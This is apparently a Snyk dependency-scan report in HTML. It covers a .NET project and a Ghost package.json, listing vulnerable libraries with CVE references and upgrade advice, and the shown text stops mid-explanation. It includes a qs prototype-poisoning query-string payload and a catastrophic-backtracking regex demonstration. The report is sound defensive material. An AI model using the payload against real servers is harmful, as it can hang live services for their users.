+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+</head>
+<body><header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta"><p class="timestamp">November 13, 2025 15:29 UTC</p></div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+<main>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">tpwe</span>
+    <span class="meta-label">Target file</span><span class="meta-value">dotnet/obj/project.assets.json (84 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 6</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">5 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">1 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (6)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">130</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Denial of Service (DoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-DOTNET-SYSTEMNETHTTP-60045</li>
+      <li class="card-meta-item">CWE-254</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> System.Net.Http@4.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Net.Http@4.3.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.nuget.org/packages/System.Net.Http/" target="_blank" rel="noopener noreferrer">System.Net.Http</a> is an Provides a programming interface for modern HTTP applications, including HTTP client components that allow applications to consume web services over HTTP and HTTP components that can be used by both clients and servers for parsing HTTP headers.</p><p>Affected versions of this package are vulnerable to Denial of Service (DoS)</p><p>as <code>ASP.NET Core</code> fails to properly validate web requests.</p><p><strong>NOTE:</strong> Microsoft has not commented on third-party claims that the issue is that the <code>TextEncoder.EncodeCore</code> function in the <code>System.Text.Encodings.Web</code> package in ASP.NET Core Mvc before 1.0.4 and 1.1.x before 1.1.3 allows remote attackers to cause a denial of service by leveraging failure to properly calculate the length of 4-byte characters in the Unicode Non-Character range.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>System.Net.Http</code> to version 4.1.2, 4.3.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/aspnet/Announcements/issues/239" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul><ul><li><a href="https://technet.microsoft.com/en-us/library/security/4021279.aspx" target="_blank" rel="noopener noreferrer">Microsoft Security Advisory</a></li></ul><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0247" target="_blank" rel="noopener noreferrer">NVD</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-DOTNET-SYSTEMNETHTTP-60045" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">115</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Improper Certificate Validation</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-DOTNET-SYSTEMNETHTTP-60046</li>
+      <li class="card-meta-item">CWE-287</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> System.Net.Http@4.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Net.Http@4.3.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.nuget.org/packages/System.Net.Http/" target="_blank" rel="noopener noreferrer">System.Net.Http</a> is a Provides a programming interface for modern HTTP applications, including HTTP client components that allow applications to consume web services over HTTP and HTTP components that can be used by both clients and servers for parsing HTTP headers.</p><p>Affected versions of this package are vulnerable to Improper Certificate Validation. It allows an attacker to bypass _Enhanced Security Usage_ tagging when they present a certificate that is invalid for a specific use.</p><h2>Remediation</h2><p>Upgrade <code>System.Net.Http</code> to version 4.1.2, 4.3.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/aspnet/Announcements/issues/239" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li><li><a href="https://technet.microsoft.com/en-us/library/security/4021279.aspx" target="_blank" rel="noopener noreferrer">Microsoft Security Advisory</a></li><li><a href="https://nvd.nist.gov/vuln/detail/2017-0248" target="_blank" rel="noopener noreferrer">NVD</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-DOTNET-SYSTEMNETHTTP-60046" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">115</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Privilege Escalation</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-DOTNET-SYSTEMNETHTTP-60047</li>
+      <li class="card-meta-item">CWE-269</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> System.Net.Http@4.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Net.Http@4.3.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.nuget.org/packages/System.Net.Http/" target="_blank" rel="noopener noreferrer">System.Net.Http</a> Provides a programming interface for modern HTTP applications, including HTTP client components that allow applications to consume web services over HTTP and HTTP components that can be used by both clients and servers for parsing HTTP headers.</p><p>Affected versions of this package are vulnerable to Privilege Escalation</p><p>due to failing to properly sanitize web requests.</p><h2>Remediation</h2><p>Upgrade <code>System.Net.Http</code> to version 4.1.2, 4.3.2 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/aspnet/Announcements/issues/239" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-DOTNET-SYSTEMNETHTTP-60047" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">123</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Information Exposure</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-DOTNET-SYSTEMNETHTTP-72439</li>
+      <li class="card-meta-item">CWE-200</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> System.Net.Http@4.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Net.Http@4.3.0</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.nuget.org/packages/System.Net.Http/" target="_blank" rel="noopener noreferrer">System.Net.Http</a> Provides a programming interface for modern HTTP applications, including HTTP client components that allow applications to consume web services over HTTP and HTTP components that can be used by both clients and servers for parsing HTTP headers.</p><p>Affected versions of this package are vulnerable to Information Exposure.</p><p>When HTTP authentication information is inadvertently exposed in an outbound request that encounters an HTTP redirect. An attacker who successfully exploited this vulnerability could use the information to further compromise the web application.</p><p><strong>Note:</strong> The presence of <code>System.Net.Http</code> in the dependency graph of <code>netcoreapp2.0</code> isn&#39;t the final determination of what is loaded at runtime. The version conflict resolution logic will prefer what is present in <code>Microsoft.NETCore.App/2.1.5</code>, or the latest patch release. As such, is not considered an issue.</p><h2>Remediation</h2><p>Upgrade <code>System.Net.Http</code> to version 2.0.20710, 4.0.1-beta-23225, 4.1.4, 4.3.4 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/dotnet/announcements/issues/88" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-DOTNET-SYSTEMNETHTTP-72439" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">119</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-DOTNET-SYSTEMTEXTREGULAREXPRESSIONS-174708</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> System.Text.RegularExpressions@4.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Text.RegularExpressions@4.3.0</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 3 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Xml.ReaderWriter@4.3.0 &#x203A; System.Text.RegularExpressions@4.3.0</div>
+        <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; System.Xml.XmlDocument@4.3.0 &#x203A; System.Xml.ReaderWriter@4.3.0 &#x203A; System.Text.RegularExpressions@4.3.0</div>
+        <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Xml.XDocument@4.3.0 &#x203A; System.Xml.ReaderWriter@4.3.0 &#x203A; System.Text.RegularExpressions@4.3.0</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.nuget.org/packages/System.Text.RegularExpressions/" target="_blank" rel="noopener noreferrer">System.Text.RegularExpressions</a> is a regular expression engine.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS)</p><p>due to improperly processing of RegEx strings.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>System.Text.RegularExpressions</code> to version 4.3.1 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/dotnet/announcements/issues/111" target="_blank" rel="noopener noreferrer">GitHub Issue</a></li></ul><ul><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0820" target="_blank" rel="noopener noreferrer">Microsoft Security Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-DOTNET-SYSTEMTEXTREGULAREXPRESSIONS-174708" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">48</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Authentication Bypass</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-DOTNET-SYSTEMNETHTTP-60048</li>
+      <li class="card-meta-item">CWE-20</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> System.Net.Http@4.3.0</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">tpwe@1.0.0 &#x203A; NSubstitute@4.3.0 &#x203A; Castle.Core@4.4.1 &#x203A; NETStandard.Library@1.6.1 &#x203A; System.Net.Http@4.3.0</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p>The ASP.NET Core fails to properly sanitize the _Web Request Handler_ component, allowing an attacker to spoof web requests and bypass authentication.</p><h2>References</h2><ul><li><a href="https://github.com/aspnet/Announcements/issues/239" target="_blank" rel="noopener noreferrer">https://github.com/aspnet/Announcements/issues/239</a></li><li><a href="https://technet.microsoft.com/en-us/library/security/4021279.aspx" target="_blank" rel="noopener noreferrer">https://technet.microsoft.com/en-us/library/security/4021279.aspx</a></li><li><a href="https://nvd.nist.gov/vuln/detail/2017-0256" target="_blank" rel="noopener noreferrer">https://nvd.nist.gov/vuln/detail/2017-0256</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-DOTNET-SYSTEMNETHTTP-60048" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Software Composition Analysis</span>
+    <span class="meta-label">Project path</span><span class="meta-value">multi-project</span>
+    <span class="meta-label">Project</span><span class="meta-value">package.json</span>
+    <span class="meta-label">Target file</span><span class="meta-value">ghost/package.json (23 dependencies)</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 19</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">5 HIGH</span>
+    <span class="severity-badge" style="background:#D68000">10 MEDIUM</span>
+    <span class="severity-badge" style="background:#88879E">4 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Security Issues (19)</h2></summary>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">150</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Prototype Poisoning</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-QS-3153490</li>
+      <li class="card-meta-item">CWE-1321</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> qs@0.6.6</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; qs@0.6.6</div>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/qs" target="_blank" rel="noopener noreferrer">qs</a> is a querystring parser that supports nesting and arrays, with a depth limit.</p><p>Affected versions of this package are vulnerable to Prototype Poisoning which allows attackers to cause a Node process to hang, processing an Array object whose prototype has been replaced by one with an excessive length value.</p><p><strong>Note:</strong> In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as <code>a[__proto__]=b&amp;a[__proto__]&amp;a[length]=100000000</code>.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.</p><p>Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.</p><p>One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.</p><p>When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.</p><p>Two common types of DoS vulnerabilities:</p><ul><li>High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, <a href="https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082" target="_blank" rel="noopener noreferrer">commons-fileupload:commons-fileupload</a>.</li></ul><ul><li>Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  <a href="https://snyk.io/vuln/npm:ws:20171108" target="_blank" rel="noopener noreferrer">npm <code>ws</code> package</a></li></ul><h2>Remediation</h2><p>Upgrade <code>qs</code> to version 6.2.4, 6.3.3, 6.4.1, 6.5.3, 6.6.1, 6.7.3, 6.8.3, 6.9.7, 6.10.3 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/ljharb/qs/pull/428" target="_blank" rel="noopener noreferrer">GitHub PR</a></li><li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2150323" target="_blank" rel="noopener noreferrer">RedHat Bugzilla Bug</a></li><li><a href="https://github.com/n8tz/CVE-2022-24999" target="_blank" rel="noopener noreferrer">Researcher Advisory</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-QS-3153490" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="risk-score"><div class="risk-score__label">RISK SCORE</div><div class="risk-score__value">101</div></div>
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">npm:fresh:20170908</li>
+      <li class="card-meta-item">CWE-400</li>
+      <li class="card-meta-item">Security</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> fresh@0.2.2</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; fresh@0.2.2</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 2 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; send@0.2.0 &#x203A; fresh@0.2.2</div>
+        <div class="dep-path">package.json@ &#x203A; express@4.0.0 &#x203A; serve-static@1.0.1 &#x203A; send@0.1.4 &#x203A; fresh@0.2.0</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://www.npmjs.com/package/fresh" target="_blank" rel="noopener noreferrer"><code>fresh</code></a> is HTTP response freshness testing.</p><p>Affected versions of this package are vulnerable to Regular expression Denial of Service (ReDoS) attacks. A Regular Expression (<code>/ *, */</code>) was used for parsing HTTP headers and take about 2 seconds matching time for 50k characters.</p><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By 